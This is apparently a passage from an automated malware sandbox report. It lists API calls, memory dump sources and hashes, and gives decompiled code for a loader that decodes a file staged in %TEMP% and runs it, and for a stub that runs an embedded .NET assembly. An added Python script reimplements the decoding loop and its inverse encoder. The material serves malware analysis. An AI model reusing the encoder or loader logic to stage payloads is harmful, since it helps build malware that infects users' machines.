            • DebugBreak.KERNEL32 ref: 6F65101A
            • GetTempPathW.KERNEL32(00000103,?), ref: 6F65102C
            • lstrcatW.KERNEL32(?,\ks446tcfy17w7jqy3r), ref: 6F651047
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F651066
            • GetFileSize.KERNEL32(00000000,00000000), ref: 6F65107B
            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6F651092
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 6F6510AA
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.691360334.000000006F651000.00000020.00020000.sdmp, Offset: 6F650000, based on PE: true
            • Associated: 0000000C.00000002.691346421.000000006F650000.00000002.00020000.sdmp
            • Associated: 0000000C.00000002.691368165.000000006F652000.00000002.00020000.sdmp
            • Associated: 0000000C.00000002.691379692.000000006F654000.00000002.00020000.sdmp
            Similarity
            • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
            • String ID: \ks446tcfy17w7jqy3r
            • API String ID: 4020703165-2035310939
            • Opcode ID: dd4c89e591819437fcf5559a26250c590023ac43ad2499852a8c103f25272dd5
            • Instruction ID: 3b34cf203370b5f81187a3aff94fd812445fd89867d48bc79f73e720d95b5f53
            • Opcode Fuzzy Hash: dd4c89e591819437fcf5559a26250c590023ac43ad2499852a8c103f25272dd5
            • Instruction Fuzzy Hash: 2D21F431602711ABEB209F728C5EFEB7B68EB06760F104251E664B20C0DF74613DCA60
            Uniqueness

            Uniqueness Score: -1.00%
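            The per-byte transform in the loop of E6F651000 (6F6510C0 to 6F6510E9) is all that separates the staged file %TEMP%\ks446tcfy17w7jqy3r from the code the loader calls at L10, so an analyst holding the dropped file wants it as a reusable function. The script below is an added example, not code from the report or from the sample: it transcribes the decompiler's expression literally, treating the decompiler's `!` as bitwise NOT (the x86 `not` instruction) and reducing every step modulo 256, and it does not place the `rol cl, 0x2` that the decompiler could not fold into the expression, so the result has to be confirmed against the disassembly before it is trusted on the real file. The inverse is included so the transcription can be checked as a bijection and so a test input can be produced; the sample payload is constructed.

```python
"""Transcription of the byte transform from E6F651000 (added example, not the sample's code).

Assumptions: the decompiler's ``!`` is bitwise NOT, all arithmetic is modulo 256,
and the unplaced ``rol cl, 0x2`` is ignored; confirm against the disassembly.
"""

MASK = 0xFF


def decode_byte(b: int, i: int) -> int:
    """Apply the loop body to file byte ``b`` at index ``i`` (file byte -> code byte)."""
    t = (~((b + 3) ^ 0x6A)) & MASK          # !( *(buf + i) + 3 ^ 0x6a)
    t ^= 0xE1                               # ... ^ 0xe1
    t = (t - i) & MASK                      # ... - _t23
    t ^= i & MASK                           # ... ^ _t23
    t = (0x82 - t) & MASK                   # 0x82 - (...)
    t ^= 0x68                               # ... ^ 0x68
    return (t - 1 + i) & MASK               # ... - 1 + _t23


def encode_byte(c: int, i: int) -> int:
    """Exact inverse of decode_byte: every step above is invertible modulo 256."""
    t = (c + 1 - i) & MASK
    t ^= 0x68
    t = (0x82 - t) & MASK
    t ^= i & MASK
    t = (t + i) & MASK
    t ^= 0xE1
    t = (~t) & MASK
    t ^= 0x6A
    return (t - 3) & MASK


def decode_blob(data: bytes) -> bytes:
    """What the loader does to the whole staged file before calling into it."""
    return bytes(decode_byte(b, i) for i, b in enumerate(data))


def encode_blob(code: bytes) -> bytes:
    """Produce a file that the transcribed loop would decode back to ``code``."""
    return bytes(encode_byte(c, i) for i, c in enumerate(code))


def is_bijective() -> bool:
    """For a spread of indices, check that the transform permutes all 256 byte values."""
    return all(len({decode_byte(b, i) for b in range(256)}) == 256
               for i in range(0, 1024, 37))


if __name__ == "__main__":
    # Constructed sample: a recognisable plaintext stands in for the shellcode.
    sample_code = b"constructed sample payload, not real shellcode"
    staged = encode_blob(sample_code)
    assert decode_blob(staged) == sample_code
    print("round trip ok; byte 0x00 at index 0 decodes to %#04x" % decode_byte(0, 0))
```

            If the decoded output of the real staged file does not start with plausible x86 code, the missing `rol` is the first thing to place: it operates on `cl`, so it sits somewhere inside the per-byte arithmetic and changes only which intermediate value is rotated.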

            APIs
            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02B71520
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02B7157F
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.691286346.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
            Similarity
            • API ID: AllocCreateFileVirtual
            • String ID: b1a2f4be1bb040dfae4382b4765a8fb2
            • API String ID: 1475775534-2543734446
            • Opcode ID: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction ID: b4885d5e8b9c8f04be96f631fff0ba8cb53f6257eb35da08595e99f2eff5818f
            • Opcode Fuzzy Hash: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction Fuzzy Hash: 9AE15A30E54388EDEB21CBE4DC05BEDBBB5AF05710F1044DAE608FA191D7B50A84DB26
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02B7081B
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02B709E8
            Memory Dump Source
            • Source File: 0000000C.00000002.691286346.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction ID: 0108102181a05154a0902a57ad8e83a29952ab707e69f2cf73dae93d3d111377
            • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction Fuzzy Hash: E0A1F374E10249EFEF10DFE8C845BADBBB1EF18315F20489AE625BA290D3755A40DF10
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 02B70387
            • GetThreadContext.KERNELBASE(?,00010007), ref: 02B703AA
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02B703CE
            Memory Dump Source
            • Source File: 0000000C.00000002.691286346.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
            Similarity
            • API ID: Process$ContextCreateMemoryReadThread
            • String ID:
            • API String ID: 2411489757-0
            • Opcode ID: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction ID: b1f509be9725177fdb7c8972df35d61fbe7ac052b3d0b54156570193b128eb39
            • Opcode Fuzzy Hash: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction Fuzzy Hash: 9C322671E50218EFEB20DBA4DC55BADB7B5FF48704F20449AE618FA2A0D7709A80DF15
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Executed Functions

            C-Code - Quality: 100%
            			// CRT startup: installs E00401E29 as the top-level unhandled-exception filter.
            			E00401E1D() {
            				_Unknown_base(*)()* _t1;
            
            				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
            				return _t1;
            			}

            APIs
            • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
            • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Sample logic, not CRT: the native stub's payload handoff. Locates resource id 1 of type RT_RCDATA in its own
            			// image and passes pointer and size to L00401000, which (per the API and string entries below) hosts the CLR
            			// v4.0.30319 through CLRCreateInstance to run the blob as a managed assembly; the stub then calls ExitProcess.
            			E00401489() {
            				void* _v8;
            				struct HRSRC__* _t4;
            				long _t10;
            				struct HRSRC__* _t12;
            				void* _t16;
            
            				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed; lpName = MAKEINTRESOURCE(1), lpType = 0xa = RT_RCDATA
            				_t12 = _t4;
            				if(_t12 == 0) {
            					L6:
            					ExitProcess(0);
            				}
            				_t16 = LoadResource(GetModuleHandleW(0), _t12);
            				if(_t16 != 0) {
            					_v8 = LockResource(_t16);
            					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
            					_t13 = _v8;
            					if(_v8 != 0 && _t10 != 0) {
            						L00401000(_t13, _t10); // executed; CLR host (CLRCreateInstance, "v4.0.30319") that runs the resource as a managed assembly
            					}
            				}
            				FreeResource(_t16);
            				goto L6;
            			}

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
            • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
            • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
            • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
            • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
              • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
            • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
            • ExitProcess.KERNEL32 ref: 004014EE
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
            • String ID: v4.0.30319
            • API String ID: 2372384083-3152434051
            • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
            • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 0499B730
            • GetCurrentThread.KERNEL32 ref: 0499B76D
            • GetCurrentProcess.KERNEL32 ref: 0499B7AA
            • GetCurrentThreadId.KERNEL32 ref: 0499B803
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID: 0io
            • API String ID: 2063062207-2987954341
            • Opcode ID: 716a7f10fe31fc5324675b4a419c45c82fdd78cb8cd0a10488ae866d1bc0ca59
            • Instruction ID: 53e6a7ae245349bf2d762bc42bcc17fb255ffdbfd556d2d43d3b8f55def8d7d4
            • Opcode Fuzzy Hash: 716a7f10fe31fc5324675b4a419c45c82fdd78cb8cd0a10488ae866d1bc0ca59
            • Instruction Fuzzy Hash: B45158B49043488FEB10CFA9D588BDEBBF1FF48314F24856AD459A7790C778A844CB66
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 0499B730
            • GetCurrentThread.KERNEL32 ref: 0499B76D
            • GetCurrentProcess.KERNEL32 ref: 0499B7AA
            • GetCurrentThreadId.KERNEL32 ref: 0499B803
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID: 0io
            • API String ID: 2063062207-2987954341
            • Opcode ID: 3517b243e14fa6154568e32ec7c1b70d2fbf3f0e23b31403e7b18ee3a8e81624
            • Instruction ID: 912ea04427f2970b98dc1c800b87e0f0e43eb910b25c4d103d99eccb44e066b9
            • Opcode Fuzzy Hash: 3517b243e14fa6154568e32ec7c1b70d2fbf3f0e23b31403e7b18ee3a8e81624
            • Instruction Fuzzy Hash: A15147B09043488FEB10CFA9D588BDEBBF5FF88314F248569E419A7750D774A844CBA6
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 04997F5D
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: CallbackDispatcherUser
            • String ID: 0io
            • API String ID: 2492992576-2987954341
            • Opcode ID: 20de9eb85d542b70500b346a0c6022cdb15e13fcc14484dd105f827ebb7f05aa
            • Instruction ID: a0d0e96f15409742398090faf2fa2f28b987a2a2696eff7750ddfdc7473df3b9
            • Opcode Fuzzy Hash: 20de9eb85d542b70500b346a0c6022cdb15e13fcc14484dd105f827ebb7f05aa
            • Instruction Fuzzy Hash: E5119D74809398CEDB10CFA9D4443DAFFF4AB05314F54846EE89477242C778A659CBA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			#include <windows.h>
            			
            			/* Callees inside the sample; signatures inferred from the call sites. */
            			WCHAR* E0040558E(WCHAR* block);                 /* appears to return the end of the block */
            			void*  E00403E3D(void* ctx, long size);          /* allocator (see E00403E3D below) */
            			void   E0040ACF0(void* dst, void* src, long n);  /* memcpy-like copy */
            			void   E00403E03(void* p);
            			
            			void* E004055C5(void* __ecx) {
            				void* _t6;
            				long _t12;       /* used but never declared in the decompiler output */
            				void* _t14;
            				void* _t18;
            				WCHAR* _t19;
            
            				_t14 = __ecx;
            				/* Snapshot of the process environment block (UTF-16, double-NUL terminated). */
            				_t19 = GetEnvironmentStringsW();
            				if(_t19 != 0) {
            					/* Byte length of the block. The decompiler emitted this expression twice
            					   (once per use) with the pointer difference taken in bytes; it is
            					   computed once here with the same arithmetic. */
            					long diff = (char*)E0040558E(_t19) - (char*)_t19;
            					_t12 = (diff >> 1) + (diff >> 1);
            					_t6 = E00403E3D(_t14, _t12); // executed
            					_t18 = _t6;
            					if(_t18 != 0) {
            						E0040ACF0(_t18, _t19, _t12);   /* copy the block into the new buffer */
            					}
            					E00403E03(0);
            					FreeEnvironmentStringsW(_t19);
            				} else {
            					_t18 = 0;
            				}
            				return _t18;
            			}

            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: EnvironmentStrings$Free
            • String ID:
            • API String ID: 3328510275-0
            • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
            • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5c659abb1658d7960febb10d98b923917397a9ac9d7f11bd240d373cca7d3c4e
            • Instruction ID: 19acb7890d01f1e3cd3501d1b170b09c2dbab64c4307bef6a54ff77c26036e7e
            • Opcode Fuzzy Hash: 5c659abb1658d7960febb10d98b923917397a9ac9d7f11bd240d373cca7d3c4e
            • Instruction Fuzzy Hash: F122A378E44205CFDB14CB94D488ABEBFB2FFA9310F15819AD46267355C736E881CB51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 0499962E
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 75602968e5962d0115b248fce5bab78f970ee1b6577af7aa3b87ce3172071349
            • Instruction ID: 16e2e69b5a5f8efe9264a10143ac0f7f21791864bc113530d17c8077d0d52b6e
            • Opcode Fuzzy Hash: 75602968e5962d0115b248fce5bab78f970ee1b6577af7aa3b87ce3172071349
            • Instruction Fuzzy Hash: 3C7103B0A00B158FDB64DF6AD05175ABBF6BF88204F008A2ED58AD7B40D735F845CB91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0499FD0A
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 2e8f757c696e6f8e1f3abca7f4bf6276d92ad884efd54653d8b4dc699a27c1a0
            • Instruction ID: d6a2e551340e51b45ce326343609c1552f8e6b8db9b1bd6c056b0f9f89a82aa2
            • Opcode Fuzzy Hash: 2e8f757c696e6f8e1f3abca7f4bf6276d92ad884efd54653d8b4dc699a27c1a0
            • Instruction Fuzzy Hash: 3B51AFB5D002499FDF14CFA9C884ADDFBB5BF48314F24812AE819AB214D774A945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0499FD0A
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: fa079afb5efe218a8bccd1bb420b4a0e645997d38fb85104f034c0f55a196efd
            • Instruction ID: 4327a54f72539564820d4f5d13e2f280521628f60c34caf0eae25929758ea437
            • Opcode Fuzzy Hash: fa079afb5efe218a8bccd1bb420b4a0e645997d38fb85104f034c0f55a196efd
            • Instruction Fuzzy Hash: 0A4190B1D003499FDF14CF99D884ADEFBB5BF48314F24812AE819AB214D775A945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 051C46B1
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 6605d623bcd3116e1aafb2ee7c44a7a37261191e24a15e130d800fdd390a1dc1
            • Instruction ID: 247671a2dbaa8c8446070a944979191e23c594169cab77571c97271dc12ccd0a
            • Opcode Fuzzy Hash: 6605d623bcd3116e1aafb2ee7c44a7a37261191e24a15e130d800fdd390a1dc1
            • Instruction Fuzzy Hash: 804123B1C08758CFDB24DFA9C884BCDBBB1BF59304F2480AAD408AB255D7B55946CF91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 051C46B1
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: edbbf765597c41bbfbb12a288f305f550e8141fbdffca81f77f5a7b8b90d1398
            • Instruction ID: 569e092a97a5f362a03b93dca3ef8bfe13c33a154acc99d9fee5e0d8d9a1fe06
            • Opcode Fuzzy Hash: edbbf765597c41bbfbb12a288f305f550e8141fbdffca81f77f5a7b8b90d1398
            • Instruction Fuzzy Hash: 104110B1C08758CBDB24DFA9C884BCEBBB5BF59304F20806AD408AB251D7B56945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CallWindowProcW.USER32(?,?,?,?,?), ref: 051C2531
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CallProcWindow
            • String ID:
            • API String ID: 2714655100-0
            • Opcode ID: e7368f215ccd9937b889ea286537d6ec918741f52c5e5c309478c78becc4fd2e
            • Instruction ID: 4842641fea0aacf0aae6d63800cb9497ac9db4345c293f5c75a0e06d1441970d
            • Opcode Fuzzy Hash: e7368f215ccd9937b889ea286537d6ec918741f52c5e5c309478c78becc4fd2e
            • Instruction Fuzzy Hash: C6411AB8A003058FDB14CF99C448BAAFBF6FB98314F158599D559AB321D375A841CFA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 5410e0fe664d461db42535c812960a2a1b5c4d4b0244170e2a088e107211bda5
            • Instruction ID: 8df5cbfe3818f07e133259d668d247babdb0f1536c571cea2f5f5c933431141a
            • Opcode Fuzzy Hash: 5410e0fe664d461db42535c812960a2a1b5c4d4b0244170e2a088e107211bda5
            • Instruction Fuzzy Hash: 94318C72908289AFDB118FA9D841BDEBFF4EF19210F05805AE954AB222C3359954DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05396320
            Memory Dump Source
            • Source File: 0000000D.00000002.704778808.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: 46fce49ae8b330ac661a4617dc5f17572f5ad147a7d0fed3e56f098b5114addd
            • Instruction ID: 81effdf9649889e751a3f48602a75a675f67312fb0089c948ca4af311379d6c4
            • Opcode Fuzzy Hash: 46fce49ae8b330ac661a4617dc5f17572f5ad147a7d0fed3e56f098b5114addd
            • Instruction Fuzzy Hash: 8A2177B59043488FCB10DF99D445B9EBBF8BF59310F14816AE858AB251C739A944CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0499BD87
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 51f46cc2d8b644995b4470c00d0b6a539941d6bda12f9716b0d962513f2eb52a
            • Instruction ID: ab7e195f0e51a07c2371cf00f8250d37355cae4e6cdbdab4cca39c54380c61c1
            • Opcode Fuzzy Hash: 51f46cc2d8b644995b4470c00d0b6a539941d6bda12f9716b0d962513f2eb52a
            • Instruction Fuzzy Hash: 9721B0B5D002489FDB10CFA9E584BDEFBF4FB48314F15852AE958A7210C378A955CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0499BD87
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: d76c49b542577ae6b2a33b85bf41ed78e9c34859c5c8020711c3d1e018daf35b
            • Instruction ID: 4001263064332e13961dcbcd28f5e7b2715e5d14da2638d04192ee5c25841f22
            • Opcode Fuzzy Hash: d76c49b542577ae6b2a33b85bf41ed78e9c34859c5c8020711c3d1e018daf35b
            • Instruction Fuzzy Hash: 8F21B3B59002489FDB10CFA9D484ADEFBF8FB48314F14852AE958A7210D378A954CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,049996A9,00000800,00000000,00000000), ref: 049998BA
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: e023a99f2e45f34629ea7bbf69cf7ff7a2e2c0335fdb6ad4b50959586efba1a4
            • Instruction ID: 6c62a678d5d619eacb548b176b31991ea45e65441626a6d398127fa8fb1cefae
            • Opcode Fuzzy Hash: e023a99f2e45f34629ea7bbf69cf7ff7a2e2c0335fdb6ad4b50959586efba1a4
            • Instruction Fuzzy Hash: 9011F2B59042498FDB10CF9AD444BDEFBF8AB48314F14852EE919A7700C375A945CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,049996A9,00000800,00000000,00000000), ref: 049998BA
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: a487b2fc840e327360ccfa74b8d1f92e334548ff4fd52c41e84bc6d888d33b37
            • Instruction ID: 5ee8cf66b7aec557cb909a9dcf194760e29e1c69315f93348ca5d44877000987
            • Opcode Fuzzy Hash: a487b2fc840e327360ccfa74b8d1f92e334548ff4fd52c41e84bc6d888d33b37
            • Instruction Fuzzy Hash: 1A1114B6D002498FDB10CF9AD444BDEFBF4AB88314F15852ED419A7700C375A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 819308d68ac88987386edc03baa0eb71ac48fe6c7bcc3bd3b1d1b527716a45e7
            • Instruction ID: 810016a21104419282d38171e395f99cac2ddf6309f28c69f656504d7fb601e5
            • Opcode Fuzzy Hash: 819308d68ac88987386edc03baa0eb71ac48fe6c7bcc3bd3b1d1b527716a45e7
            • Instruction Fuzzy Hash: AE1137B5804249DFDB10CFA9D844BDEBFF8EF58314F14841AE954A7210C379A954CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,022753E8,00000000,?), ref: 051CE73D
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 83cd24eeeea508939ed2ebebab1ce9bc04a21c38138dcbc4ca31a5c6d773f5a0
            • Instruction ID: b89184e4a9098b5ed9f5cb4aa377f92df1503be80192c63fc9e6f265fe02cea4
            • Opcode Fuzzy Hash: 83cd24eeeea508939ed2ebebab1ce9bc04a21c38138dcbc4ca31a5c6d773f5a0
            • Instruction Fuzzy Hash: 9A1146B58003499FDB10CF99C445BEEFBF8EB48314F10846AE954A3200C378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • PostMessageW.USER32(?,022753E8,00000000,?), ref: 051CE73D
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: 68b40dff6cb660e12a56a06acfd0184bff112df614eb2e30cc6721334cff2fb5
            • Instruction ID: cac54eec24af736bbb7525c1729239b42f817b244334832b00898d21f862be79
            • Opcode Fuzzy Hash: 68b40dff6cb660e12a56a06acfd0184bff112df614eb2e30cc6721334cff2fb5
            • Instruction Fuzzy Hash: 981134B58003499FDB10CF99C885BDEBFF8EB48314F14845AE858A3201C379A544CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05396320
            Memory Dump Source
            • Source File: 0000000D.00000002.704778808.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: ed8a85211a8f5a43a4a6a6b4c6e7e4d3736bbfa0d8a0447ee3b9d1514ddf9a24
            • Instruction ID: fc548c7b9597e412936f0daa1a4ccd1013fce61aa719b06cf38d3d3af5b2954e
            • Opcode Fuzzy Hash: ed8a85211a8f5a43a4a6a6b4c6e7e4d3736bbfa0d8a0447ee3b9d1514ddf9a24
            • Instruction Fuzzy Hash: 161133B58002498FDB20CF99D485BDEFBF4EB48324F14842AD969A7240C378A944CFA1
            Uniqueness

